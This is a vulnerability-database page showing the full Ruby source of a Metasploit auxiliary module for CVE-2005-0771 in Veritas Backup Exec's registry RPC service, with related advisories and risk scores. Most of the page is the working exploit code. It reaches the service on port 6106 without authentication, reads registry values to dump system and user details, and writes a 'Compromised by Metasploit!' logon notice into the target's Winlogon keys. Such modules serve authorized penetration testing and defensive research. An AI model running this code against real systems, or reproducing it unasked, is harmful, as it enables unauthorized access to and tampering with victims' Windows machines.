Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Veritas Backup Exec Server Registry Access

🗓️ 31 Aug 2024 00:00:00Reported by Jay Turla, metasploit.comType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 362 Views

Veritas Backup Exec Server Registry Access module exploits a remote registry access flaw in the BackupExec Windows Server RPC service. The vulnerability was discovered by Pedram Amini and is based on the NDR stub information posted to openrce.org

Related
Code
ReporterTitlePublishedViews
Family
Circl		CVE-2005-0771
29 May 201815:50
circl
Check Point Advisories		Symantec Veritas Backup Exec Server Remote Registry Access (CAN-2005-0771)
11 Jul 200500:00
checkpoint_advisories
Check Point Advisories		Veritas Backup Exec Server Remote Registry Access Code Execution - Ver2 (CVE-2005-0771)
31 Mar 201400:00
checkpoint_advisories
CVE		CVE-2005-0771
29 Jun 200504:00
cve
Cvelist		CVE-2005-0771
29 Jun 200504:00
cvelist
Metasploit		Veritas Backup Exec Server Registry Access
2 Dec 200619:48
metasploit
NVD		CVE-2005-0771
23 Jun 200504:00
nvd
securityvulns		[VulnWatch] iDEFENSE Security Advisory 06.23.05: Veritas Backup Exec Server Remote Registry Access Vulnerability
24 Jun 200500:00
securityvulns
Tenable Nessus		VERITAS Backup Exec Agent Unauthenticated Remote Registry Access
8 Aug 200500:00
nessus
CERT		VERITAS Backup Exec remote registry access validation vulnerability
24 Jun 200500:00
cert
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::DCERPC  
include Msf::Post::Windows::Registry  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Veritas Backup Exec Server Registry Access',  
'Description' => %q{  
This modules exploits a remote registry access flaw in the BackupExec Windows  
Server RPC service. This vulnerability was discovered by Pedram Amini and is based  
on the NDR stub information posted to openrce.org.  
Please see the action list for the different attack modes.  
  
},  
'Author' => [ 'hdm' ],  
'License' => MSF_LICENSE,  
'References' =>  
[  
[ 'OSVDB', '17627' ],  
[ 'CVE', '2005-0771' ],  
[ 'URL', 'https://web.archive.org/web/20110801042138/http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=269'],  
],  
'Actions' =>  
[  
['System Information', 'Description' => 'Dump system info (user, owner, OS, CPU...)'],  
['Create Logon Notice', 'Description' => 'Add a logon notice']  
],  
'DefaultAction' => 'System Information'  
))  
  
register_options(  
[  
Opt::RPORT(6106),  
OptString.new('WARN',  
[  
false,  
"The warning to display for the Logon Notice action",  
"Compromised by Metasploit!\r\n"  
]  
),  
])  
end  
  
def auxiliary_commands  
return {  
"regread" => "Read a registry value",  
# "regenum" => "Enumerate registry keys",  
}  
end  
  
def run  
case action.name  
when 'System Information'  
system_info()  
when 'Create Logon Notice'  
logon_notice()  
end  
end  
  
  
def cmd_regread(*args)  
  
if (args.length == 0)  
print_status("Usage: regread HKLM\\\\Hardware\\\\Description\\\\System\\\\SystemBIOSVersion")  
return  
end  
  
paths = args[0].split("\\")  
hive = paths.shift  
subval = paths.pop  
subkey = paths.join("\\")  
data = backupexec_regread(hive, subkey, subval)  
  
if (data)  
print_status("DATA: #{deunicode(data)}")  
else  
print_error("Failed to read #{hive}\\#{subkey}\\#{subval}...")  
end  
  
end  
  
def cmd_regenum(*args)  
  
if (args.length == 0)  
print_status("Usage: regenum HKLM\\\\Software")  
return  
end  
  
paths = args[0].split("\\")  
hive = paths.shift  
subkey = "\\" + paths.join("\\")  
data = backupexec_regenum(hive, subkey)  
  
if (data)  
print_status("DATA: #{deunicode(data)}")  
else  
print_error("Failed to enumerate #{hive}\\#{subkey}...")  
end  
  
end  
  
def system_info  
print_status("Dumping system information...")  
  
prod_id = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows\\CurrentVersion', 'ProductId') || 'Unknown'  
prod_name = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'ProductName') || 'Windows (Unknown)'  
prod_sp = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'CSDVersion') || 'No Service Pack'  
owner = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOwner') || 'Unknown Owner'  
company = backupexec_regread('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion', 'RegisteredOrganization') || 'Unknown Company'  
cpu = backupexec_regread('HKLM', 'Hardware\\Description\\System\\CentralProcessor\\0', 'ProcessorNameString') || 'Unknown CPU'  
username = backupexec_regread('HKCU', 'Software\\Microsoft\\Windows\\CurrentVersion\\Explorer', 'Logon User Name') || 'SYSTEM'  
  
print_status("The current interactive user is #{deunicode(username)}")  
print_status("The operating system is #{deunicode(prod_name)} #{deunicode(prod_sp)} (#{deunicode(prod_id)})")  
print_status("The system is registered to #{deunicode(owner)} of #{deunicode(company)}")  
print_status("The system runs on a #{deunicode(cpu)}")  
end  
  
def logon_notice  
print_status("Setting the logon warning to #{datastore['WARN'].strip}...")  
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeText', REG_SZ, datastore['WARN'])  
backupexec_regwrite('HKLM', 'Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon', 'LegalNoticeCaption', REG_SZ, 'METASPLOIT')  
end  
  
  
def deunicode(str)  
str.gsub(/\x00/, '').strip  
end  
  
#  
# Write a registry key  
#  
def backupexec_regwrite(hive, subkey, subval, type, data)  
stub = backupexec_regrpc_write(  
:hive => registry_hive_lookup(hive),  
:subkey => subkey,  
:subval => subval,  
:type => type,  
:data => data  
)  
resp = backupexec_regrpc_call(5, stub)  
return false if resp.length == 0  
return true  
end  
  
#  
# Read a registry key  
#  
def backupexec_regread(hive, subkey, subval, type = REG_SZ)  
stub = backupexec_regrpc_read(  
:hive => registry_hive_lookup(hive),  
:subkey => subkey,  
:subval => subval,  
:type => type  
)  
resp = backupexec_regrpc_call(4, stub)  
  
return nil if resp.length == 0  
ret, len = resp[0,8].unpack('VV')  
return nil if ret == 0  
return nil if len == 0  
return resp[8, len]  
end  
  
#  
# Enumerate a registry key  
#  
def backupexec_regenum(hive, subkey)  
stub = backupexec_regrpc_enum(  
:hive => registry_hive_lookup(hive),  
:subkey => subkey  
)  
resp = backupexec_regrpc_call(7, stub)  
p resp  
  
return nil if resp.length == 0  
ret, len = resp[0,8].unpack('VV')  
return nil if ret == 0  
return nil if len == 0  
return resp[8, len]  
end  
  
#  
# Call the backupexec registry service  
#  
def backupexec_regrpc_call(opnum, data = '')  
  
handle = dcerpc_handle(  
'93841fd0-16ce-11ce-850d-02608c44967b', '1.0',  
'ncacn_ip_tcp', [datastore['RPORT']]  
)  
  
dcerpc_bind(handle)  
  
resp = dcerpc.call(opnum, data)  
outp = ''  
  
if (dcerpc.last_response and dcerpc.last_response.stub_data)  
outp = dcerpc.last_response.stub_data  
end  
  
disconnect  
  
outp  
end  
  
# RPC Service 4  
def backupexec_regrpc_read(opts = {})  
subkey = opts[:subkey] || ''  
subval = opts[:subval] || ''  
hive = opts[:hive] || HKEY_LOCAL_MACHINE  
type = opts[:type] || REG_SZ  
  
stub =  
NDR.UnicodeConformantVaryingString(subkey) +  
NDR.UnicodeConformantVaryingString(subval) +  
NDR.long(type) +  
NDR.long(1024) +  
NDR.long(0) +  
NDR.long(4) +  
NDR.long(4) +  
NDR.long(hive)  
return stub  
end  
  
# RPC Service 7  
def backupexec_regrpc_enum(opts = {})  
subkey = opts[:subkey] || ''  
hive = opts[:hive] || HKEY_LOCAL_MACHINE  
stub =  
NDR.UnicodeConformantVaryingString(subkey) +  
NDR.long(4096) +  
NDR.long(0) +  
NDR.long(4) +  
NDR.long(4) +  
NDR.long(hive)  
return stub  
end  
  
# RPC Service 5  
def backupexec_regrpc_write(opts = {})  
subkey = opts[:subkey] || ''  
subval = opts[:subval] || ''  
hive = opts[:hive] || HKEY_LOCAL_MACHINE  
type = opts[:type] || REG_SZ  
data = opts[:data] || ''  
  
if (type == REG_SZ || type == REG_EXPAND_SZ)  
data = Rex::Text.to_unicode(data+"\x00")  
end  
  
stub =  
NDR.UnicodeConformantVaryingString(subkey) +  
NDR.UnicodeConformantVaryingString(subval) +  
NDR.long(type) +  
NDR.long(data.length) +  
NDR.long(data.length) +  
data +  
NDR.align(data) +  
NDR.long(4) +  
NDR.long(4) +  
NDR.long(hive)  
return stub  
end  
end  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
31 Aug 2024 00:00Current
7High risk
Vulners AI Score7
CVSS 210
EPSS0.81368
registry accessbackupexecremoteflawwindows serverrpc servicevulnerabilitypedram aminindr stub information
362